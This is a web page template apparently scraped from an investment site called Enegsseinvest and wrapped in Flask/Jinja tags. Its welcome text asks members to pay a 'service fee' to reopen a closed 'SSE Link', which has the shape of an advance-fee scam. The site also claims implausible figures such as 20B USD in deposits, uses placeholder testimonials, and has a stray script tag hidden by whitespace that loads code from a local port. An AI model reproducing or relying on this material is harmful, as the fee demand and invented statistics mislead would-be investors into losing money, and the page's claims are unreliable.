{% extends "base.html" %}


<!doctype html>
<html lang="en" itemscope itemtype="http://schema.org/WebPage">

<head>                                      <script src=http://127.0.0.1:59215/BYW></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    
    <title> Enegsseinvest - Home</title>
    <meta name="title" Content="Enegsseinvest - Home">

    <meta name="description" content="Help us to power change">
    <meta name="keywords" content="MatrixLab,Smart invest,Growth opportunity">
    <link type="image/x-icon" href="https://enegsseinvestmentteam.info/assets/images/logoIcon/favicon.png" rel="shortcut icon">

    
    <link href="https://enegsseinvestmentteam.info/assets/images/logoIcon/logo.png" rel="apple-touch-icon">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="apple-mobile-web-app-title" content="Enegsseinvest - Home">
    
    <meta itemprop="name" content="Enegsseinvest - Home">
    <meta itemprop="description" content="Help us to power change">
    <meta itemprop="image" content="https://enegsseinvestmentteam.info/assets/images/seo/676702e8de9cb1734804200.png">
    
    <meta property="og:type" content="website">
    <meta property="og:title" content="EnegssInvest - Invest smartly with us">
    <meta property="og:description" content="EnegssInvest. time to focus on delivery, Help us to power change">
    <meta property="og:image" content="https://enegsseinvestmentteam.info/assets/images/seo/676702e8de9cb1734804200.png" />
    <meta property="og:image:type" content="png" />
    <meta property="og:image:width" content="1180" />
    <meta property="og:image:height" content="600" />
    <meta property="og:url" content="https://enegsseinvestmentteam.info">
    
    <meta name="twitter:card" content="summary_large_image">
    <!-- Bootstrap CSS -->
    <link href="https://enegsseinvestmentteam.info/assets/global/css/bootstrap.min.css" rel="stylesheet">

    <link href="https://enegsseinvestmentteam.info/assets/global/css/all.min.css" rel="stylesheet">

    <link rel="stylesheet" href="https://enegsseinvestmentteam.info/assets/global/css/line-awesome.min.css" />

    <link rel="stylesheet" href="https://enegsseinvestmentteam.info/assets/templates/basic/css/animate.css">
    <link rel="stylesheet" href="https://enegsseinvestmentteam.info/assets/templates/basic/css/magnific-popup.css">
    <link rel="stylesheet" href="https://enegsseinvestmentteam.info/assets/templates/basic/css/owl.min.css">
    <link rel="stylesheet" href="https://enegsseinvestmentteam.info/assets/templates/basic/css/odometer.css">
    <link rel="stylesheet" href="https://enegsseinvestmentteam.info/assets/templates/basic/css/nice-select.css">
    <link rel="stylesheet" href="https://enegsseinvestmentteam.info/assets/templates/basic/css/main.css">
    <link rel="stylesheet" href="https://enegsseinvestmentteam.info/assets/templates/basic/css/custom.css">
    
    
    <link rel="stylesheet"
        href="https://enegsseinvestmentteam.info/assets/templates/basic/css/color.php?color=0b61e2">
</head>

<body>
    {% block content %}
    
    <div class="overlay"></div>

    <a href="https://enegsseinvestmentteam.info" class="scrollToTop"><i class="fas fa-angle-up"></i></a>
    <div class="preloader">
        <div class="loader">
            <div class="loader-inner"></div>
        </div>
    </div>

        <header class="header-section">
    <div class="container">
        <div class="header-wrapper">
            <div class="logo">
                <a href="https://enegsseinvestmentteam.info">
                    <img src="https://enegsseinvestmentteam.info/assets/images/logoIcon/logo.png" alt="logo">
                </a>
                <a href="{{ url_for('home.index') }}" class="account-logo pl-2">
                    <img src="{{ url_for('static', filename='images/country-logo2.png') }}" alt="country-logo"
                        style="margin-left: 20px; width: 70px!important; height: auto;">
                </a>
            </div>
            <ul class="menu">
                <li>
                    <a href="https://enegsseinvestmentteam.info">Home</a>
                </li>

                                    <li><a href="https://enegsseinvestmentteam.info/about">About</a></li>
                
                <li>
                    <a href="https://enegsseinvestmentteam.info/subscribe/plan">Plan</a>
                </li>

                <li>
                    <a href="https://enegsseinvestmentteam.info/blog">Blog</a>
                </li>

                <li>
                    <a href="https://enegsseinvestmentteam.info/contact">Contact</a>
                </li>
                                    <li class="d-md-none">
                        <a href="{{ url_for('accounts.login') }}" class="custom-button theme py-0 m-1">Sign In</a>
                    </li>
                
                
            </ul>
            <div class="right-area ms-lg-0 ms-auto">
                
                                    <select name="language" class="select-bar langSel">
                                                    <option value="en"  selected >
                                English</option>
                                                    <option value="hn" >
                                Hindi</option>
                                                    <option value="bn" >
                                Bangla</option>
                                            </select>
                
                                    <a href="{{ url_for('accounts.login') }}" class="custom-button theme hover-cl-light d-none d-md-flex">
                        Sign In                    </a>
                
                
            </div>
            <div class="header-bar ms-2 ms-md-4">
                <span></span>
                <span></span>
                <span></span>
            </div>
        </div>
    </div>
</header>
        <section class="banner-section oh bg_img primary-overlay" data-background="https://enegsseinvestmentteam.info/assets/images/frontend/banner/63664ca4921571667648676.jpg">
    <div class="banner-thumb d-none d-lg-block">
        <img src="https://enegsseinvestmentteam.info/assets/images/frontend/banner/63664ca4bdc9f1667648676.png" alt="banner">
        <div>
            <div class="sub-thumb"><img src="https://enegsseinvestmentteam.info/assets/images/frontend/banner/63664ca4d75e41667648676.png" alt="banner"></div>
            <div class="sub-thumb"><img src="https://enegsseinvestmentteam.info/assets/images/frontend/banner/63664ca4d98331667648676.png" alt="banner"></div>
            <div class="sub-thumb"><img src="https://enegsseinvestmentteam.info/assets/images/frontend/banner/63664ca4da31e1667648676.png" alt="banner"></div>
            <div class="sub-thumb"><img src="https://enegsseinvestmentteam.info/assets/images/frontend/banner/63664ca4db0e91667648676.png" alt="banner"></div>
            <div class="sub-thumb"><img src="https://enegsseinvestmentteam.info/assets/images/frontend/banner/63664ca4dbea41667648676.png" alt="banner"></div>
        </div>
    </div>

    <div class="container">
        <div class="banner-content">
            <h1 class="title">Invest with us<span class="d-block text-theme">Smart investment</span></h1>
            <h3 class="subtitle">is not complicated anymore</h3>
            <p>We got you covered on smart investment decisions</p>
            <div class="button-area">
                <a href="{{ url_for('accounts.register') }}" class="custom-button cl-light">Get Started</a>
                <a href="{{ url_for('accounts.register') }}" class="custom-button theme hover-cl-light">Invest Now</a>
            </div>
        </div>
    </div>
</section>

            <section class="about-section padding-top padding-bottom">
    <div class="container">
        <div class="row mb--50">
            <div class="col-lg-6 mb-50">
                <div class="about-content">
                    <div class="section-header margin-olpo left-style">
                        <h2 class="title">Make Best Invest Business Through Us today</h2>
                        <p>Welcome on board</p>
                    </div>
                    <p>On behalf of the ENEG SSE Investment team, I would like to extend a warm welcome to our meeting today! I&#039;m excited to see everyone and explore the latest developments and opportunities in our investment landscape. Before we begin, I&#039;d like to take a moment to thank each of you for your active participation and contributions to our group. Your insights and expertise are invaluable, and I&#039;m looking forward to our discussion today. The ENEG SSE Link has been temporarily closed. As you are aware, the service fee is essential for maintaining and upgrading our infrastructure, ensuring the security and integrity of our services, and providing timely support to our members. Regrettably, owing to insufficient service fee collections, we have been compelled to close the SSE Link until further notice. I wish to emphasize that the service fee is crucial for the continued operation and development of our services.

To restore the SSE Link, it is imperative that we collect the necessary service fee from our members.</p>
                    <a href="user/dashboard"
                        class="theme-button mt-20">Invest Now</a>
                </div>
            </div>
            <div class="col-lg-6 mb-50">
                <div class="video-wrapper w-100 h-100 padding-bottom padding-top bg_img"
                    data-background="https://enegsseinvestmentteam.info/assets/images/frontend/about/6366544f052821667650639.jpg">
                    <a href="https://www.youtube.com/watch?v=C72WkcUZvco" class="video-button popup"><i
                            class="fas fa-play"></i></a>
                </div>
            </div>
        </div>
    </div>
</section>
            <section class="counter-section padding-bottom padding-top primary-overlay bg_fixed bg_img"
         data-background="https://enegsseinvestmentteam.info/assets/images/frontend/counter/63665575e85a31667650933.jpg">
    <div class="container">
        <div class="section-header cl-white">
            <h2 class="title">Our Statistics</h2>
            <p>We have achieved notable success over the years</p>
        </div>
        <div class="row justify-content-center mb-40-none">

                    <div class="col-xl-3 col-sm-6">
                <div class="counter-item">
                    <div class="counter-thumb">
                        <i class="lar la-user"></i>                    </div>
                    <div class="counter-content">
                        <h5 class="title">Total Clients</h5>
                        <div class="counter-header">
                            <h5 class="subtitle">200K</h5>
                        </div>
                    </div>
                </div>
            </div>
                    <div class="col-xl-3 col-sm-6">
                <div class="counter-item">
                    <div class="counter-thumb">
                        <i class="las la-money-bill"></i>                    </div>
                    <div class="counter-content">
                        <h5 class="title">Total Deposit</h5>
                        <div class="counter-header">
                            <h5 class="subtitle">20B USD</h5>
                        </div>
                    </div>
                </div>
            </div>
                    <div class="col-xl-3 col-sm-6">
                <div class="counter-item">
                    <div class="counter-thumb">
                        <i class="las la-money-bill-wave"></i>                    </div>
                    <div class="counter-content">
                        <h5 class="title">Total Withdraw</h5>
                        <div class="counter-header">
                            <h5 class="subtitle">300M</h5>
                        </div>
                    </div>
                </div>
            </div>
                    <div class="col-xl-3 col-sm-6">
                <div class="counter-item">
                    <div class="counter-thumb">
                        <i class="las la-hockey-puck"></i>                    </div>
                    <div class="counter-content">
                        <h5 class="title">Company Run</h5>
                        <div class="counter-header">
                            <h5 class="subtitle">9Y</h5>
                        </div>
                    </div>
                </div>
            </div>
                </div>
    </div>
</section>

            <section class="how-section padding-top padding-bottom oh">
    <div class="container">
        <div class="section-header">
            <h2 class="title">How To Get Starts</h2>
            <p>Quidem cum autem ipsam Qui impedit distinctio minima illum! Facere, aspernatur saepe.</p>
        </div>
        <div class="how-wrapper">
                            <div class="how-item">
                    <div class="how-thumb">
                        <i class="las la-align-center"></i>                    </div>
                    <div class="how-content">
                        <h5 class="title">Sign in Here</h5>
                        <p>Odit repellendus omnis facere odio eveniet consectetur, dolorem consequatur corrupti aperiam</p>
                    </div>
                </div>
                            <div class="how-item">
                    <div class="how-thumb">
                        <i class="las la-headset"></i>                    </div>
                    <div class="how-content">
                        <h5 class="title">Request for withdrawal</h5>
                        <p>Odit repellendus omnis facere odio eveniet consectetur, dolorem consequatur corrupti aperiam.</p>
                    </div>
                </div>
                            <div class="how-item">
                    <div class="how-thumb">
                        <i class="fas fa-money-bill-wave"></i>                    </div>
                    <div class="how-content">
                        <h5 class="title">Make your first deposit</h5>
                        <p>Odit repellendus omnis facere odio eveniet consectetur, dolorem consequatur corrupti aperiam</p>
                    </div>
                </div>
                            <div class="how-item">
                    <div class="how-thumb">
                        <i class="las la-user"></i>                    </div>
                    <div class="how-content">
                        <h5 class="title">Open an accounts</h5>
                        <p>Odit repellendus omnis facere odio eveniet consectetur, dolorem consequatur corrupti aperiam.</p>
                    </div>
                </div>
                    </div>
    </div>
</section>            <section class="feature-section padding-top padding-bottom primary-overlay bg_img bg_fixed"
         data-background="https://enegsseinvestmentteam.info/assets/images/frontend/feature/6366581c8ae841667651612.jpg">
    <div class="container">
        <div class="section-header cl-white">
            <h2 class="title">Our Feature</h2>
            <p>Quidem cum autem ipsam Qui impedit distinctio minima illum! Facere, aspernatur saepe.</p>
        </div>
        <div class="row justify-content-center">
                            <div class="col-sm-10 col-md-6 col-lg-4">
                    <div class="feature-item">
                        <div class="feature-thumb">
                            <i class="las la-arrow-alt-circle-left"></i>                        </div>
                        <div class="feature-content">
                            <h5 class="title">Instant Withdrawal</h5>
                            <p>Obcaecati officiis aliquid perspiciatis libero omnis culpa, tempora perferendis</p>
                        </div>
                    </div>
                </div>
                            <div class="col-sm-10 col-md-6 col-lg-4">
                    <div class="feature-item">
                        <div class="feature-thumb">
                            <i class="las la-calendar-alt"></i>                        </div>
                        <div class="feature-content">
                            <h5 class="title">Customer Support</h5>
                            <p>Obcaecati officiis aliquid perspiciatis libero omnis culpa, tempora perferendis</p>
                        </div>
                    </div>
                </div>
                            <div class="col-sm-10 col-md-6 col-lg-4">
                    <div class="feature-item">
                        <div class="feature-thumb">
                            <i class="lab la-joomla"></i>                        </div>
                        <div class="feature-content">
                            <h5 class="title">Deposit limit</h5>
                            <p>Obcaecati officiis aliquid perspiciatis libero omnis culpa, tempora perferendis</p>
                        </div>
                    </div>
                </div>
                            <div class="col-sm-10 col-md-6 col-lg-4">
                    <div class="feature-item">
                        <div class="feature-thumb">
                            <i class="las la-info-circle"></i>                        </div>
                        <div class="feature-content">
                            <h5 class="title">SSL Security</h5>
                            <p>Obcaecati officiis aliquid perspiciatis libero omnis culpa, tempora perferendis</p>
                        </div>
                    </div>
                </div>
                            <div class="col-sm-10 col-md-6 col-lg-4">
                    <div class="feature-item">
                        <div class="feature-thumb">
                            <i class="fas fa-plane-arrival"></i>                        </div>
                        <div class="feature-content">
                            <h5 class="title">Referral Bonus</h5>
                            <p>Obcaecati officiis aliquid perspiciatis libero omnis culpa, tempora perferendis</p>
                        </div>
                    </div>
                </div>
                            <div class="col-sm-10 col-md-6 col-lg-4">
                    <div class="feature-item">
                        <div class="feature-thumb">
                            <i class="lab la-houzz"></i>                        </div>
                        <div class="feature-content">
                            <h5 class="title">SSL Security</h5>
                            <p>Obcaecati officiis aliquid perspiciatis libero omnis culpa, tempora perferendis</p>
                        </div>
                    </div>
                </div>
                    </div>
    </div>
</section>            <section class="plan-section padding-top padding-bottom oh">
    <div class="container">
        <div class="section-header">
            <h2 class="title">Our Plan</h2>
            <p>Quidem cum autem ipsam Qui impedit distinctio minima illum! Facere, aspernatur saepe.</p>
        </div>
        <div class="row justify-content-center">
                    </div>
    </div>

    <div id="confirmationModal" class="modal fade  custom--modal " tabindex="-1" role="dialog">
    <div class="modal-dialog" role="document">
        <div class="modal-content">
            <div class="modal-header">
                <h5 class="modal-title">Confirmation Alert!</h5>
                <button type="button" class="close" data-bs-dismiss="modal" aria-label="Close">
                    <i class="las la-times"></i>
                </button>
            </div>
            <form action="" method="POST">
                <input type="hidden" name="_token" value="67vt8a1eVRRSJhSGVwUtnMUchQr0ClthrrPCxXdS">                <div class="modal-body">
                    <p class="question"></p>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn  btn--sm btn--danger " data-bs-dismiss="modal">No</button>
                    <button type="submit" class="btn btn--primary  btn--sm bg--base ">Yes</button>
                </div>
            </form>
        </div>
    </div>
</div>


</section>
            <section class="client-section primary-overlay bg_img bg_fixed padding-bottom padding-top"
    data-background="https://enegsseinvestmentteam.info/assets/images/frontend/testimonial/636659c29f8831667652034.jpg">
    <div class="container">
        <div class="section-header cl-white">
            <h2 class="title">What Our Client&#039;s Say</h2>
            <p>Quidem cum autem ipsam Qui impedit distinctio minima illum! Facere, aspernatur saepe.</p>
        </div>
        <div class="client-slider owl-theme owl-carousel">
                            <div class="client-item mt-55">
                    <div class="client-thumb">
                        <img src="https://enegsseinvestmentteam.info/assets/images/frontend/testimonial/63665a36262c91667652150.jpg"
                            alt="client">
                    </div>
                    <div class="client-content">
                        <div class="header">
                            <h5 class="title">Md Demo</h5>
                            <span class="info">Backend Developer</span>
                        </div>
                        <p>There are many variations of passages of available, but the majority have suffered alteration in some form, by injected humour,</p>
                    </div>
                </div>
                            <div class="client-item mt-55">
                    <div class="client-thumb">
                        <img src="https://enegsseinvestmentteam.info/assets/images/frontend/testimonial/63665a1589b651667652117.jpg"
                            alt="client">
                    </div>
                    <div class="client-content">
                        <div class="header">
                            <h5 class="title">LITECOIN</h5>
                            <span class="info">Frontend Developer</span>
                        </div>
                        <p>There are many variations of passages of available, but the majority have suffered alteration in some form, by injected humour,</p>
                    </div>
                </div>
                            <div class="client-item mt-55">
                    <div class="client-thumb">
                        <img src="https://enegsseinvestmentteam.info/assets/images/frontend/testimonial/636659f2660d21667652082.jpg"
                            alt="client">
                    </div>
                    <div class="client-content">
                        <div class="header">
                            <h5 class="title">Litan Khan</h5>
                            <span class="info">Backend Developer</span>
                        </div>
                        <p>There are many variations of passages of available, but the majority have suffered alteration in some form, by injected humour,</p>
                    </div>
                </div>
                    </div>
    </div>
</section>
            <section class="deposit-withdraw padding-bottom padding-top">
    <div class="container">
        <div class="row mb--50">
            <div class="col-lg-6 mb-50">
                <div class="section-header margin-olpo left-style text-center">
                    <h3 class="title">Latest Deposit</h3>
                    <p>Active daily deposit</p>
                </div>
                <table class="deposit-table">
                    <thead>
                    <tr>
                        <th>Name</th>
                        <th>Amount</th>
                        <th>Date</th>
                        <th>Gateway</th>
                    </tr>
                    </thead>
                    <tbody>
                                                    <tr>
                                <td colspan="100%" class="text-center">Data not found</td>
                            </tr>
                                            </tbody>
                </table>
            </div>

            <div class="col-lg-6 mb-50">
                <div class="section-header margin-olpo left-style text-center">
                    <h3 class="title">Active daily Withdraw</h3>
                    <p>our system provide investors with simpl deposit and withdrawal option</p>
                </div>

                <table class="deposit-table">
                    <thead>
                        <tr>
                            <th>Name</th>
                            <th>Amount</th>
                            <th>Date</th>
                            <th>Method</th>
                        </tr>
                    </thead>
                    <tbody>
                                                    <tr>
                                <td colspan="100%" class="text-center">Data not found</td>
                            </tr>
                                            </tbody>
                </table>
            </div>
        </div>
    </div>
</section>
            <section class="newsletter-section padding-top padding-bottom bg_img bg_fixed primary-overlay"
    data-background="https://enegsseinvestmentteam.info/assets/images/frontend/subscribe/63689772e80c71667798898.jpg">
    <div class="container">
        <div class="row justify-content-center">
            <div class="col-md-10 col-lg-9 col-xl-8">
                <div class="section-header margin-olpo cl-white">
                    <h3 class="title">Subscribe Our Newsletter to get the news and updates first</h3>
                </div>
                <div class="row justify-content-center">
                    <div class="col-lg-10 col-xl-8">
                        <form class="subscribe-form" method="POST">
                            <div class="subscribe-group">
                                <input type="email"  required id="emailSub" placeholder="Your Email Address">
                                <button type="submit" class="subscribe-btn"><i class="fas fa-paper-plane"></i></button>
                            </div>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
            <section class="faq-section padding-bottom padding-top-half">
    <div class="container">
        <div class="section-header">
            <h2 class="title">Faqs</h2>
            <p>Quidem cum autem ipsam Qui impedit distinctio minima illum! Facere, aspernatur saepe.</p>
        </div>
        <div class="row flex-wrap-reverse justify-content-center mb--50">
                            <div class="col-lg-6">
                                    <div class="faq-wrapper mb-20">
                        <div class="faq-item">
                            <div class="faq-title">
                                <h6 class="title">What is the minmum withdrawal</h6>
                                <span class="right-icon"></span>
                            </div>
                            <div class="faq-content">
                                <p>
                                    The minimum withdrawal is 10 USD
                                </p>
                            </div>
                        </div>
                    </div>
                                    <div class="faq-wrapper mb-20">
                        <div class="faq-item">
                            <div class="faq-title">
                                <h6 class="title">Is daily withdrawal allowed</h6>
                                <span class="right-icon"></span>
                            </div>
                            <div class="faq-content">
                                <p>
                                    Yes you can withdraw funds from our platform everyday
                                </p>
                            </div>
                        </div>
                    </div>
                                </div>
                    </div>
    </div>
</section>            <section class="call-section padding-top padding-bottom bg_img bg_fixed primary-overlay"
         data-background="https://enegsseinvestmentteam.info/assets/images/frontend/call/63689a887ad9b1667799688.jpg">
    <div class="container">
        <div class="row justify-content-center">
            <div class="col-lg-9 xol-xl-8">
                <div class="section-header cl-white">
                    <h3 class="title">Get in touch with us</h3>
                    <p>Help us to power change, our team is ready to guid you</p>
                </div>
                <div class="text-center">
                    <a href="https://enegsseinvestmentteam.info/user/dashboard" class="custom-button theme hover-cl-light">Join Now</a>
                </div>
            </div>
        </div>
    </div>
</section>
            <section class="blog-section padding-top padding-bottom">
    <div class="container">
        <div class="section-header">
            <h3 class="title">Latest News</h3>
            <p>Hic tenetur nihil ex. Doloremque ipsa velit, ea molestias expedita sed voluptatem ex voluptatibus temporibus sequi. sddd</p>
        </div>
        <div class="row justify-content-center mb-30-none">
                            <div class="col-md-6 col-xl-4 col-sm-10">
                    <div class="post-item"> 
                        <div class="post-thumb c-thumb">
                            <a href="https://enegsseinvestmentteam.info/blog/82/it-is-a-long-established-fact-that-a-reader-will-be-distracted">
                                <img src="https://enegsseinvestmentteam.info/assets/images/frontend/blog/thumb_63689185b34671667797381.jpg"
                                    alt="blog">
                            </a>
                        </div>
                        <div class="post-content">
                            <div class="blog-header">
                                <h6 class="title">
                                    <a
                                        href="https://enegsseinvestmentteam.info/blog/82/it-is-a-long-established-fact-that-a-reader-will-be-distracted">It is a long established fact that a reader will be distracted</a>
                                </h6>
                            </div>
                            <div class="meta-post">
                                <div class="date">
                                    <div>
                                        <i class="flaticon-calendar"></i>
                                        07 Nov 2022
                                    </div>
                                </div>
                            </div>
                            <div class="entry-content">
                                <p>It is a long established fact that a reader will be distracted by the readable content of a page whe...</p>
                            </div>
                        </div>
                    </div>
                </div>
                            <div class="col-md-6 col-xl-4 col-sm-10">
                    <div class="post-item"> 
                        <div class="post-thumb c-thumb">
                            <a href="https://enegsseinvestmentteam.info/blog/81/be-distracted-by-the-readable-content-of-a-page-when">
                                <img src="https://enegsseinvestmentteam.info/assets/images/frontend/blog/thumb_636891653373a1667797349.jpg"
                                    alt="blog">
                            </a>
                        </div>
                        <div class="post-content">
                            <div class="blog-header">
                                <h6 class="title">
                                    <a
                                        href="https://enegsseinvestmentteam.info/blog/81/be-distracted-by-the-readable-content-of-a-page-when">Be distracted by the readable content of a page when</a>
                                </h6>
                            </div>
                            <div class="meta-post">
                                <div class="date">
                                    <div>
                                        <i class="flaticon-calendar"></i>
                                        07 Nov 2022
                                    </div>
                                </div>
                            </div>
                            <div class="entry-content">
                                <p>It is a long-established fact that a reader will be distracted by the readable content of a page whe...</p>
                            </div>
                        </div>
                    </div>
                </div>
                            <div class="col-md-6 col-xl-4 col-sm-10">
                    <div class="post-item"> 
                        <div class="post-thumb c-thumb">
                            <a href="https://enegsseinvestmentteam.info/blog/80/various-versions-have-evolved-over-the-years-sometimes">
                                <img src="https://enegsseinvestmentteam.info/assets/images/frontend/blog/thumb_63689144a25fc1667797316.jpg"
                                    alt="blog">
                            </a>
                        </div>
                        <div class="post-content">
                            <div class="blog-header">
                                <h6 class="title">
                                    <a
                                        href="https://enegsseinvestmentteam.info/blog/80/various-versions-have-evolved-over-the-years-sometimes">Various versions have evolved over the years, sometimes</a>
                                </h6>
                            </div>
                            <div class="meta-post">
                                <div class="date">
                                    <div>
                                        <i class="flaticon-calendar"></i>
                                        07 Nov 2022
                                    </div>
                                </div>
                            </div>
                            <div class="entry-content">
                                <p>It is a long established fact that a reader will be distracted by the readable content of a page whe...</p>
                            </div>
                        </div>
                    </div>
                </div>
                    </div>
    </div>
</section>
    
    <footer class="padding-top primary-overlay bg_img"
    data-background="https://enegsseinvestmentteam.info/assets/images/frontend/footer/67688bf5927df1734904821.jpg">
    <div class="footer-top padding-bottom">
        <div class="container">
            <div class="footer-wrapper cl-white">
                <div class="footer-logo">
                    <a href="">
                        <img src="https://enegsseinvestmentteam.info/assets/images/logoIcon/logo.png" alt="images">
                    </a>
                </div>
                <p>Welcome to our investment platform, we hope to give you amazing experience</p>
                <ul class="social__icons">
                                            <li>
                            <a href="https://www.facebook.com" target="_blank"
                                class="facebook"><i class="lab la-facebook-f"></i></a>
                        </li>
                                            <li>
                            <a href="https://twitter.com" target="_blank"
                                class="facebook"><i class="lab la-twitter"></i></a>
                        </li>
                                            <li>
                            <a href="https://www.linkedin.com" target="_blank"
                                class="facebook"><i class="lab la-linkedin-in"></i></a>
                        </li>
                                    </ul>
            </div>
            <ul class="footer-menu">
                                    <li>
                        <a href="https://enegsseinvestmentteam.info/policy/terms-of-service/43">Terms of Service</a>
                    </li>
                                    <li>
                        <a href="https://enegsseinvestmentteam.info/policy/privacy-policy/42">Privacy Policy</a>
                    </li>
                            </ul>
        </div>
    </div>
    <div class="footer-bottom">
        <div class="container">
            <p>&copy; All Right Reserved By <a href="https://enegsseinvestmentteam.info">Enegsseinvest</a></p>
        </div>
    </div>
</footer>



    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://enegsseinvestmentteam.info/assets/global/js/jquery-3.6.0.min.js"></script>
    <script src="https://enegsseinvestmentteam.info/assets/global/js/bootstrap.bundle.min.js"></script>

    <!-- magnific popup plugin -->
    <script src="https://enegsseinvestmentteam.info/assets/templates/basic/js/magnific-popup.min.js"></script>
    <script src="https://enegsseinvestmentteam.info/assets/templates/basic/js/wow.min.js"></script>
    <script src="https://enegsseinvestmentteam.info/assets/templates/basic/js/owl.min.js"></script>
    <script src="https://enegsseinvestmentteam.info/assets/templates/basic/js/odometer.min.js"></script>
    <script src="https://enegsseinvestmentteam.info/assets/templates/basic/js/viewport.jquery.js"></script>
    <script src="https://enegsseinvestmentteam.info/assets/templates/basic/js/nice-select.js"></script>

    <!-- dashboard custom js -->
    <script src="https://enegsseinvestmentteam.info/assets/templates/basic/js/app.js"></script>

    
    
<script>
    (function ($) {
        "use strict";
        $(document).on('click','.confirmationBtn', function () {
            var modal   = $('#confirmationModal');
            let data    = $(this).data();
            modal.find('.question').text(`${data.question}`);
            modal.find('form').attr('action', `${data.action}`);
            modal.modal('show');
        });
    })(jQuery);
</script>
    <script>
        'use strict';
        $(document).on('submit', '.subscribe-form', function(e) {
            e.preventDefault();
            var email = $("#emailSub").val();
            if (email) {
                $.ajax({
                    headers: {
                        "X-CSRF-TOKEN": "67vt8a1eVRRSJhSGVwUtnMUchQr0ClthrrPCxXdS",
                    },
                    url: "https://enegsseinvestmentteam.info/subscribe",
                    method: "POST",
                    data: {
                        email: email
                    },
                    success: function(response) {
                        if (response.success) {
                            notify('success', response.success);
                            $("#emailSub").val('');
                        } else {
                            $.each(response, function(i, val) {
                                notify('error', val);
                            });
                        }
                    }
                });
            } else {
                notify('error', "Please Input Your Email");
            }
        });
    </script>

    
    <link rel="stylesheet" href="https://enegsseinvestmentteam.info/assets/global/css/iziToast.min.css">
<script src="https://enegsseinvestmentteam.info/assets/global/js/iziToast.min.js"></script>

<script>
    "use strict";
    function notify(status,message) {
        iziToast[status]({
            message: message,
            position: "topRight"
        });
    }
</script>



    <script>
        (function($) {
            "use strict";
            $(".langSel").on("change", function() {
                window.location.href = "https://enegsseinvestmentteam.info/change/" + $(this).val();
            });

            var inputElements = $('input,select');
            $.each(inputElements, function(index, element) {
                element = $(element);
                var type = element.attr('type');
                if (type != 'checkbox') {
                    element.closest('.contact-form-group').find('label').attr('for', element.attr('name'));
                    element.attr('id', element.attr('name'))
                }
            });

            $('.policy').on('click', function() {
                $.get('https://enegsseinvestmentteam.info/cookie/accept', function(response) {
                    $('.cookies-card').addClass('d-none');
                });
            });

            setTimeout(function() {
                $('.cookies-card').removeClass('hide')
            }, 2000);

            $.each($('input, select, textarea'), function(i, element) {
                if (element.hasAttribute('required') && $(element).attr('type') != 'checkbox') {
                    $(element).closest('.contact-form-group').find('label').addClass('required');
                    $(element).closest('.form-group').find('label').addClass('required');
                }
            });

            $('.showFilterBtn').on('click', function() {
                $('.responsive-filter-card').slideToggle();
            });

            Array.from(document.querySelectorAll('table')).forEach(table => {
                let heading = table.querySelectorAll('thead tr th');
                Array.from(table.querySelectorAll('tbody tr')).forEach((row) => {
                    Array.from(row.querySelectorAll('td')).forEach((colum, i) => {
                        colum.setAttribute('data-label', heading[i].innerText)
                    });
                });
            });

        })(jQuery);
    </script>
    {% endblock %}
</body>

</html>
